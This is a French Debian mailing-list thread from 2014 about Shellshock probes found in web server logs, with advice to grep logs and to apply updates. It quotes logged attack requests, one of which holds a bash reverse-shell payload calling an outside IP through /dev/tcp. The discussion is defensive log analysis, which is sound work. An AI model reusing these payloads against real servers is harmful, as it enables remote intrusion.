Philippe Gras wrote on Fri, Sep 26, 2014 at 05:32:58PM +0200
>
> Le 26 sept. 14 à 16:45, David Guyot a écrit :
>
> >Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
> >écrit :
> >>Ah ? Si tu gères des serveurs web je te propose de faire un
> >>simple cat
> >><fichier log serveur web>|grep "() {" et de compter le nombre de
> >>tentatives d'accès comme par exemple
> >>
> >>89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
> >>/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;};
> >>/bin/ping
> >>-c 1 198.101.206.138"
> >>
> >>ou encore
> >>
> >>202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
> >>HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
> >>/dev/tcp/195.225.34.101/3333 0>&1'"
>
> J'en ai aussi, mais pas autant que des exploits classiques sur des
> CMS vérolés.
>
> Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la
> tête avec.
>
> >D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
> >second exemple de logs sur un de mes serveurs, ce qui correspond à une
> >tentative d'implantation de porte dérobée —
> >https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/
>
> Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La
> publication de la
> faille va sûrement précipiter un paquets de gonziers à l'essayer un
> peu partout…
En effet, j'ai 2 trucs du même genre depuis hier justement, alors que
mes logs remontent assez loin.
Dominique
--
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers debian-user-french-requ...@lists.debian.org
En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Archive: https://lists.debian.org/20140926163921.ga29...@telecom-paristech.fr
